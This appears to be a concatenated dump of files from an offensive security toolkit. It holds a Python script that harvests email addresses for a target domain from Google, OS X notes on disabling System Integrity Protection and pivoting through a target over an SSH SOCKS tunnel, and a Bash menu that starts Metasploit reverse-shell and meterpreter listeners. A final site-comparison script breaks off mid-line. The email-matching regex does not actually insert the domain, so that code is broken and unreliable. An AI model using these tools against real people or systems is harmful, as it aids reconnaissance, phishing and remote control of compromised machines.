24 | /23     255.255.254.0           2 C              510
25 | /24     255.255.255.0           1 C              254
26 | /25     255.255.255.128       1/2 C              126
27 | /26     255.255.255.192       1/4 C               62
28 | /27     255.255.255.224       1/8 C               30
29 | /28     255.255.255.240      1/16 C               14
30 | /29     255.255.255.248      1/32 C                6
31 | /30     255.255.255.252      1/64 C                2
32 | /31     255.255.255.254    1 /128 C                2
33 | /32     255.255.255.255    1 /256 C                1
34 | ------------------------------------------------------------------------------------------------------------------------------------------------------
35 | 
36 | # Reserved Networks
37 | 
38 | Class   Start          End                IPs           Comment
39 | A       10.0.0.0       10.255.255.255     16,777,216      1 single Class A
40 | B       172.16.0.0     172.31.255.255      1,048,544     16 contiguous Class Bs
41 | C       192.168.0.0    192.168.255.255        65,534    256 contiguous Class Cs
42 | 


--------------------------------------------------------------------------------
/mods/goog-mail.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import http.client
 4 | import re
 5 | import string
 6 | import sys
 7 | import urllib.request
 8 | import urllib.parse
 9 | 
10 | 
11 | def StripTags(text):
12 |     finished = 0
13 |     while not finished:
14 |         finished = 1
15 |         start = text.find(b"<")
16 |         if start >= 0:
17 |             stop = text[start:].find(b">")
18 |             if stop >= 0:
19 |                 text = text[:start] + text[start+stop+1:]
20 |                 finished = 0
21 |     return text
22 | 
23 | 
24 | if len(sys.argv) != 2:
25 |     print("\nExtracts emails from Google results.")
26 |     print("\nUsage: ./goog-mail.py ")
27 |     sys.exit(1)
28 | 
29 | domain_name = sys.argv[1]
30 | d = {}
31 | page_counter = 0
32 | 
33 | try:
34 |     while page_counter < 50:
35 |         results = 'https://groups.google.com/groups?q='+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
36 |         request = urllib.request.Request(results)
37 |         request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)')
38 |         opener = urllib.request.build_opener()                           
39 |         text = opener.open(request).read()
40 |         emails = re.findall(rb"([\w\.\-]+@'+domain_name+')", StripTags(text))
41 |         for email in emails:
42 |             d[email] = 1
43 |             uniq_emails = list(d.keys())
44 |         page_counter = page_counter + 10
45 | except IOError as e:
46 |     print(e)
47 | 
48 | page_counter_web = 0
49 | 
50 | try:
51 |     while page_counter_web < 50:
52 |         results_web = 'https://www.google.com/search?q=%40'+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter_web) + '&sa=N'
53 |         request_web = urllib.request.Request(results_web)
54 |         request_web.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)')
55 |         opener_web = urllib.request.build_opener()                           
56 |         text = opener_web.open(request_web).read()
57 |         emails_web = re.findall(rb"([\w\.\-]+@'+domain_name+')", StripTags(text))
58 |         for email_web in emails_web:
59 |             d[email_web] = 1
60 |             uniq_emails_web = list(d.keys())
61 |         page_counter_web = page_counter_web + 10
62 | except IOError as e:
63 |     print(e)
64 | 
65 | for uniq_emails_web in list(d.keys()):
66 |     print(uniq_emails_web+"")
67 | 


--------------------------------------------------------------------------------
/notes/osx.txt:
--------------------------------------------------------------------------------
 1 | OS X
 2 | 
 3 | 
 4 | # Add color to terminal
 5 | 
 6 | sudo nano /etc/profile
 7 | Add
 8 | export CLICOLOR=1
 9 | export LSCOLORS=ExFxBxDxCxegedabagacad
10 | ------------------------------------------------------------------------------------------------------------------------------------------------------
11 | 
12 | # Boot options
13 | 
14 | c
15 | option                                  Select boot device
16 | Apple r                                 Recovery mode
17 | Apple s                                 Single user mode
18 | 
19 | Terminal > resetpassword
20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
21 | 
22 | # Cannon 8612 UPD broadcast
23 | 
24 | killall CIJScannerRegister
25 | sudo rm  -rf /Library/Image\ Capture/Support/LegacyDeviceDiscoveryHelpers/
26 | ------------------------------------------------------------------------------------------------------------------------------------------------------
27 | 
28 | # Homebrew
29 | 
30 | /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
31 | 
32 | brew install curl
33 | brew install wget --with-libressl
34 | 
35 | brew install proxychains-ng
36 | nano /usr/local/etc/proxychains.conf
37 | socks5  127.0.0.1    1080               Add to the bottom
38 | 
39 | ssh -D 1080 -f -C -q -N user@target
40 | proxychains4 curl http://target.com
41 | 
42 | - Troubleshooting
43 | brew update
44 | brew update                             Run twice
45 | brew doctor
46 | ------------------------------------------------------------------------------------------------------------------------------------------------------
47 | 
48 | # PATH
49 | 
50 | $PATH                                   Show contents of PATH
51 | ~/.profile                              Edit PATH
52 | ------------------------------------------------------------------------------------------------------------------------------------------------------
53 | 
54 | # SIP
55 | 
56 | Reboot > command R
57 | Terminal
58 | csrutil disable; reboot
59 | 
60 | Terminal
61 | java -version
62 | More Info
63 | 
64 | Reboot > command R
65 | Terminal
66 | csrutil enable
67 | reboot
68 | 
69 | csrutil status
70 | System Integrity Protection status: enabled.
71 | ------------------------------------------------------------------------------------------------------------------------------------------------------
72 | 
73 | # Update locate database
74 | 
75 | sudo /usr/libexec/locate.updatedb
76 | 


--------------------------------------------------------------------------------
/listener.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | 
 3 | clear
 4 | f_banner
 5 | 
 6 | echo -e "${BLUE}Metasploit Listeners${NC}"
 7 | echo
 8 | echo "1.   android/meterpreter/reverse_tcp"
 9 | echo "2.   cmd/windows/reverse_powershell"
10 | echo "3.   java/jsp_shell_reverse_tcp"
11 | echo "4.   linux/x64/meterpreter_reverse_https"
12 | echo "5.   linux/x64/meterpreter_reverse_tcp"
13 | echo "6.   linux/x64/shell/reverse_tcp"
14 | echo "7.   osx/x64/meterpreter_reverse_https"
15 | echo "8.   osx/x64/meterpreter_reverse_tcp"
16 | echo "9.   php/meterpreter/reverse_tcp"
17 | echo "10.  python/meterpreter_reverse_https"
18 | echo "11.  python/meterpreter_reverse_tcp"
19 | echo "12.  windows/x64/meterpreter_reverse_https"
20 | echo "13.  windows/x64/meterpreter_reverse_tcp"
21 | echo "14.  Previous menu"
22 | echo
23 | echo -n "Choice: "
24 | read choice
25 | 
26 | case $choice in
27 |      1) payload="android/meterpreter/reverse_tcp";;
28 |      2) payload="cmd/windows/reverse_powershell";;
29 |      3) payload="java/jsp_shell_reverse_tcp";;
30 |      4) payload="linux/x64/meterpreter_reverse_https";;
31 |      5) payload="linux/x64/meterpreter_reverse_tcp";;
32 |      6) payload="linux/x64/shell/reverse_tcp";;
33 |      7) payload="osx/x64/meterpreter_reverse_https";;
34 |      8) payload="osx/x64/meterpreter_reverse_tcp";;
35 |      9) payload="php/meterpreter/reverse_tcp";;
36 |      10) payload="python/meterpreter_reverse_https";;
37 |      11) payload="python/meterpreter_reverse_tcp";;
38 |      12) payload="windows/x64/meterpreter_reverse_https";;
39 |      13) payload="windows/x64/meterpreter_reverse_tcp";;
40 |      14) f_main;;
41 |      *) f_error;;
42 | esac
43 | 
44 | echo
45 | echo -n "LHOST: "
46 | read lhost
47 | 
48 | # Check for no answer
49 | if [ -z $lhost ]; then
50 |      lhost=$ip
51 |      echo "[*] Using $ip"
52 |      echo
53 | fi
54 | 
55 | echo -n "LPORT: "
56 | read lport
57 | 
58 | # Check for no answer
59 | if [ -z $lport ]; then
60 |      lport=443
61 |      echo "[*] Using 443"
62 | fi
63 | 
64 | # Check for valid port number.
65 | if [[ $lport -lt 1 || $lport -gt 65535 ]]; then
66 |      f_error
67 | fi
68 | 
69 | # Check for root when binding to a low port
70 | if [[ $lport -lt 1025 && "$(id -u)" != "0" ]]; then
71 |      echo "You must be root to bind to a port that low."
72 |      sleep 3
73 |      f_error
74 | fi
75 | 
76 | cp $discover/resource/listener.rc /tmp/
77 | 
78 | sed -i "s|aaa|$payload|g" /tmp/listener.rc
79 | sed -i "s/bbb/$lhost/g" /tmp/listener.rc
80 | sed -i "s/ccc/$lport/g" /tmp/listener.rc
81 | 
82 | echo
83 | msfconsole -q -r /tmp/listener.rc
84 | 


--------------------------------------------------------------------------------
/misc/compare-sites.sh:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/bash
  2 | 
  3 | clear
  4 | 
  5 | break="========================================"
  6 | DIR=/root/Desktop/compare-sites
  7 | DIFFONLY=false
  8 | 
  9 | usage(){
 10 | echo
 11 | echo
 12 | echo "Compare changes to home pages."
 13 | echo
 14 | echo
 15 | echo "Where file contains a list of URLs to be compared."
 16 | echo "Usage: $0 [options] file"
 17 | echo
 18 | echo "Options:"
 19 | echo " -c Compare versions."
 20 | echo " -o Output directory. Default: /root/Desktop/compare-sites"
 21 | echo
 22 | echo
 23 | }
 24 | 
 25 | ts2date(){
 26 | date -d "1970-01-01 $1 sec"
 27 | }
 28 | 
 29 | while getopts "o:c" OPTION; do
 30 |      case $OPTION in
 31 |           o) DIR="$OPTARG";;
 32 |           c) DIFFONLY=true;;
 33 |           *) echo && echo && exit;;
 34 |      esac
 35 | done
 36 | 
 37 | shift $(($OPTIND - 1))
 38 | FILE=$*
 39 | 
 40 | if [ -z $FILE ]; then
 41 |      usage
 42 |      exit
 43 | fi
 44 | 
 45 | if [ ! -f $FILE ]; then
 46 |      echo
 47 |      echo
 48 |      echo "File does not exist."
 49 |      echo
 50 |      echo
 51 |      exit
 52 | fi
 53 | 
 54 | if [ ! -d $DIR ]; then
 55 |      mkdir $DIR
 56 | fi
 57 | 
 58 | FILEHASH=${FILEHASH%%$FILE} # remove input file name from hash string (sha256sum)
 59 | HDIR="$DIR/$FILEHASH"
 60 | VERSION=1
 61 | 
 62 | while [ -f $HDIR/$VERSION ]; do
 63 |      VERSION=$(($VERSION + 1))
 64 | done
 65 | 
 66 | if ! $DIFFONLY; then
 67 |      date +%s > $HDIR/$VERSION
 68 |      echo
 69 |      echo
 70 |      echo "Downloading:"
 71 | 
 72 |      for URL in $(cat $FILE); do
 73 |           HASH=$(sha256sum <<<$URL | tr -d " -")
 74 |           echo "[*] $URL"
 75 |           wget -q $URL -O $HDIR/$URL-$HASH-$VERSION
 76 |      done
 77 | 
 78 |      echo
 79 |      echo $break
 80 | else
 81 |      VERSION=$(($VERSION - 1))
 82 | fi
 83 | 
 84 | if [ $VERSION -gt 1 ]; then
 85 |      echo
 86 |      echo "Versions:"
 87 | 
 88 |      for ((i=1; i<=${VERSION}; i++)); do
 89 |           echo $i - $(ts2date $(cat $HDIR/$i))
 90 |      done
 91 | 
 92 |      echo
 93 |      echo -n "Base version: "
 94 |      read A
 95 |      echo -n "Compare with: "
 96 |      read B
 97 | 
 98 |      [ -z $A ] && A="1";
 99 |      [ -z $B ] && B=$VERSION
100 | 
101 |      for URL in $(cat $FILE); do
102 |           echo
103 |           echo $break
104 |           echo
105 |           echo -e "\e[1;34m$URL\e[0m"
106 |           HASH=$(sha256sum <<<$URL | tr -d " -")
107 |           diff $HDIR/$URL-$HASH-$A $HDIR/$URL-$HASH-$B | grep '